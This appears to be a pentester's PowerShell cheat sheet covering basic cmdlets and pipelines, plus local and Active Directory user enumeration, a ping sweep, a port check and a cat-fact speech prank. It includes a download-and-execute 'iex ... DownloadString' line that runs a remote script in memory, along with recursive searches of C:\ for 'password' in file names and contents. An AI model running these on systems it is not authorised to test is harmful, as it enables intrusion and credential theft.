Powershell

Basics

Use Get-Member to list all properties and methods of an object!

get-command set*    # Searches for all cmdlets that start with "set"
alias               # List all aliases in shell
Get-ChildItem       # Same as ls, dir, and gci
Copy-Item           # Same as cp, copy, and cpi
Move-Item           # Same as mv, move, and mi
Select-String       # Same as sls and similar to grep
Get-Help            # Get help!!
Get-Content         # Same as cat, type, gc
Get-Process         # Same as ps, gps
Get-Location        # Same as pwd, gl
Get-Member          # Get properties and methods of objects - USEFUL!!!!
ps | format-list -property name, id, starttime    # Formatted list of process properties
ls env:             # List all PS environment variables
ls variable:        # List all PS variables

Getting Help

help gci                # displays help for Get-ChildItem
help gci -detailed      # Very verbose help information
help gci -examples      # Examples on how to USE it!!!
help gci -full          # Pretty much everything it has about it
Remove-Item *.* -WhatIf    # Explains what WOULD happen, but not actually do it

Pipeline Objects

Used to help automate between operations in a pipe. The % is an alias for ForEach-Object command. The current object in an array of objects is referred to as $_. Pipeline objects can be filtered with the ? alias for Where-Object. Command below will write out all names and PIDs of processes returned by ps alias.

ps | gm        # Find all properties and methods first
ps | % {write-host "name is" $_.name " and pid is " $_.ID}
ps | ? {write-host "Running PID name is " $_.status -eq "running"}

# Counting loops to move between two sets of numbers
1..10 | % {echo $_}
1..255 | % {ping -n 1 192.168.0.$_ | select-string ttl}

Enumerate Local Users

Enumerate the local users on the machine and print out important information about their accounts.

Get-LocalUser | Select-Object Name, LastLogon, PasswordLastSet, Enabled, PasswordRequired, PrincipalSource, Description | Format-Table -AutoSize

Enumerate AD Users

We can import the signed Microsoft ActiveDirectory module into PowerShell directly in memory to enumerate AD users and systems. This leverages the signed module kept at https://github.com/samratashok/ADModule. After importing we have access to all AD commands in PowerShell.

iex (new-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/ADModule/master/Import-ActiveDirectory.ps1');Import-ActiveDirectory

Searching

Looking for files and directories.

# Search the entire C:\ dir for anything with "password" in the filename. Put stderr in null where it belongs
gci -recurse C:\ password 2>$null | % {echo $_.fullname}

# Select-string works similar to grep
select-string -path C:\Users\*.txt -pattern password

# Put both together! Look in each file for the string "password"
gci -recurse C:\ | % {select-string -path $_ -pattern password} 2>$null

Navigate Registry

# Can navigate Reg just like the file system using tab completion
cd HKLM:\

Launch Browsers and reach a specific page

"C:\Program Files\Internet Explorer\iexplore.exe" m4lwhere.org
"C:\Program Files\Mozilla Firefox\firefox.exe" m4lwhere.org

Networking

Quick and dirty way to check if a port is open on a remote computer

New-Object System.Net.Sockets.TCPClient –Argument "10.0.0.1","389"

Speaking to the Users!

This is a hilarious way to download a random cat fact and have it speak to the user through the speaker.

Add-Type -AssemblyName System.Speech
$SpeechSynth = New-Object System.Speech.Synthesis.SpeechSynthesizer
$SpeechSynth.SelectVoice("Microsoft Zira Desktop")
$Browser = New-Object System.Net.WebClient
$Browser.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$CatFact = (ConvertFrom-Json (Invoke-WebRequest -Verbose -Uri https://catfact.ninja/fact -UseBasicParsing))
$CatFact.fact
$SpeechSynth.Speak("Did you know ?")
$SpeechSynth.Speak($CatFact.fact)

PreviousEnumeration NextCmd

Last updated 2 years ago

Was this helpful?